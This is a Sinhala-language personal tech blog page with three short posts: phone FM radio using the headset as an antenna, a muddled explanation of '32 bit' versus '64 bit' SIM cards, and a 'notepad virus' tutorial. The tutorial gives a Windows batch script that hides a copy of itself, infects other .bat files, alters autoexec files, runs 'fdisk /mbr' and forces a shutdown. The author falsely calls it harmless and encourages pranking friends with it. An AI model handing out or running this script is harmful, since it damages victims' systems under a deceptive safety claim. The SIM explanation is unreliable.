Wednesday, April 9, 2014

ෆෝන්(phone) එකේ තියෙන රේඩියෝ එක අහන්ඩ හෑන්ඩ්ෆ්රී (handfree) එක අනිවාර්‍ය ඇයි


ෆෝන් (phone) එකේ තියෙන රේඩියෝ එක අහන්ඩ හෑන්ඩ්ෆ්රී  (handfree) එක අනිවාර්‍ය ඇයි.

ඔන්න යාලුවනේ අදත් අලුත්පෝස්ට් එකක් අරන් උදේ පාන්දරින්ම මම ආවා, (දැන් මොන උදේද) අද මම කියන්ඩ යන දේ නම් ඔයලට එච්චර වටින්නේ නැති වෙයි. කමක් නෑ කියවලා බලන්නකෝ.

ඔයාල ඉතින් හෑන්ඩ් පෝන් පාවිච්චී කරනව්වා ඇති නේද, ගොඩක් අය පෝන් පාවිච්චී කරන්නේ මල් කඩන්නයි sms ගහන්නයිනේ. ඒ උනාට ඔය පෝන් එක සින්දු අහන්නම පාවිච්චි කරන අයත් ඉන්වනේ, ඔය අතරෙන් රේඩියෝ අහන අයට වැදගත් වෙන දෙයක් තමා මම අද කියන්න යන්නේ,

ඔයාලා ඔය අහන FM තරන්ග මාලාව විකාශනය කරන්නේ ගුවන් විදුලි සන්ඤා වලින්නේ, පැහදිලිවම කියනවනම් ඉතින් අපි අහන රේඩියෝ චැනල් මෙහෙට එවන්නේ එව්වා හදන කොම්පැනි වලින්නේ ඒ කියන්නේ ගුවන් විදුලි ආයතන වලින්නේ. මේ එන සන්ඤා අල්ලා ගන්න තමයි රේඩියෝ අහන උපාන්ග වලට ඒරියල් එකක් හයි කරලා තියෙන්නේ. ඉතින් දැන් එන සමහර පෝන් වල රේඩියෝ එක තිබ්බට ඒරියල් එක නෑනේ. මේ වගේ පෝන් වලදී ඒකේ තියෙන හෑන්ඩ්ෆ්රී ඒරියල් එකක් හැටියටත් වැඩ කරනවා.

සමහරු දැන් කියයි අපේ පෝන් වල තියෙන ඇන්ටනාවට මේ රේඩියෝ සන්ඤා අල්ලා (ප්‍රෙතිග්‍රහනය කර) ගන්න බෑ කියලා,

ඒකට හේතුව ජන්ගම දුරකතන සන්ඤා සහ රේඩියෝ සන්ඤා විකාශය කරන සන්ක්‍යාත පරාසය එකිනෙකට වෙනස් වීමයි.ඒක තේරුනේ නැත්තම් අහගන්න අපිට එදිනෙදා පෝන් එකෙන් කරන (කෝල් ගන්නවා වාගේ) වැඩ වලට එන  සන්ඤා රේඩියෝ අයතන වලින් එවන සන්ඤා වලට වඩා ගොඩාක් වෙනස් වීමයි.

ප්‍රශ්න තියෙනවනම් කොමෙන්ට් එකකින් අහන්න ප්‍රශ්න නැතත් ඉතින් හොද නරක කියලා කමෙන්ට් එකක් දාන්න….ඔන්න එහෙනම් අපි ගියා…


Saturday, April 5, 2014

32 bit සහ 64 bit සිම් වල ඇති වෙනස



           32 bit සහ 64 bit සිම් වල ඇති වෙනස







  කොහොමද යලුවනේ මේක මගේ දෙවෙනි පෝස්ට් එක,
      
                                              දුරකතන සමාගම් විසින් ලබාදෙන සිම් වල 32 bit සහ 64 bit යනුවෙන් වර්ග කර ඇති බව ඔයාලා දැක තිබෙන්නට පුලුවන්.
                                                    මේ වර්ග දෙකේ ඇති ප්‍රෙදාන වෙනස නම් එහි ඇති මතක දාරිතාවයි. සිම් කාර්ඩ් එකේ මතක දාරිතවය වැඩි වීම වාසිදායකය. 
මතක දාරිතාවය වැඩී නම් එය තුල එබිය හැකි දුරකතන අන්ක සහ යනාදිය වැඩිය. අනෙක් අතට සන්නිවේදන ආයතන වල විශේශ සේවා රැගත් තොරතුරුද අඩන්ගු කල හැක්කේ වැඩි මතකයක් ඇති සිම් කාර්ඩ් තුලය. එනම් 64 bit  දාරිතාවක් ඇති සිම් තුලය.

ප්‍රශ්න තියෙනවනම් comment කරන්නකෝ........

නෝට් පෑඩ් වලින් යාලුවො පිස්සු වට්ටමුද 01


       නෝට් පෑඩ් වලින් යාලුවො පිස්සු වට්ටමුද
                       (note pad virus)

මම අද කියල දෙන්න යන්නේ නෝට් පෑඩ් වලින් කොහොමද පුන්චි වයිරසයක් හදාගන්නේ කියල

මුලින්ම ස්ටාර්ට් ගිහින් නෝට් පෑඩ් වින්ඩොව් එක විවුර්ත කර ගන්න(ස්ටාර්ට් එකේ නැත්නම් සර්ච් බොක්ස් එකේ notepad කියලා ටයිප් කරල බලන්න )

start>note pad

ඊට පස්සේ මම පහතින් දෙන කෝඩ් එක ඒකට කොපි කර ගන්න

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:\tmp.bat >null attrib +r +s +h c:\tmp.bat echo for %%i in (*.bat) do copy c:\tmp.bat+%%i %%i >>c:\windows\system32\autoexec.NT


echo echo virus detected! >>c:\windows\system32\autoexec.NT
echo pause >>c:\windows\system32\autoexec.NT
echo NT core:infected!






echo echo shame on you! >>c:\autoexec.bat
echo echo system hault-virus identified! >>c:\autoexec.bat
echo chkdsk >>c:\autoexec.bat






echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c "windows has shut down because the last service has incountered a write fault at 0x00000000000000000000000000000000000


දැන් සේව් ඈස් කියන එකට ගිහිල්ල ඔයාට කැමති නමකින් මේක .bat ෆයිල් එකක් විදියට සේව් කරගන්න
(.bat අනිවාර්‍යයි)

save as..>chamidu.bat>save

දැන් වැඩේ හරි ආ මට මුලින් කියන්න බැරි උනා මේකෙන් පරිගනකයට කිසිම හානියක් නෑ පරිගනකය shutdown වෙනවා විතරයි 

කැමති නම් මේක යාලුවෙකුට දීල බලන්න...එහෙනම් අදට ඇති මම ගියා..........